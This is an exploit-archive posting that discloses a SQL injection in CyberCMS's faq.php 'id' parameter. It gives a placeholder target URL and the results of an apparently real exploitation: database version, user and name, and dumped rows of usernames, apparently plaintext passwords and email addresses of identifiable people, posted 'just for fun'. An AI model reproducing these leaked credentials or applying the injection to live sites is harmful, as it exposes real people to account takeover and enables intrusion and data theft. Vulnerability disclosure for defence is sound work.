CyberCMS Remote SQL Injection Vuln.

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CyberCMS Remote SQL Injection Vuln.
# Published : 2010-03-26
# Author : hc0de
# Previous Title : cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
# Next Title : BPTutors Tutoring site script - [ CSRF ] Create Administrator Account

# Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | hc0de.blogspot.com<http://hc0de.blogspot.com>
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:

+Target: http://server/faq.php?id=SQL_CODE

-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole

+Datas:
3:memborg:memborg:1:memborg@cyberfusion.dk<mailto:3%3Amemborg%3Amemborg%3A1%3Amemborg@cyberfusion.dk>
6:Leder:huskerikke:1:john.landbo@morsoe.dk<mailto:6%3ALeder%3Ahuskerikke%3A1%3Ajohn.landbo@morsoe.dk>
...etc.. :) just for fun :P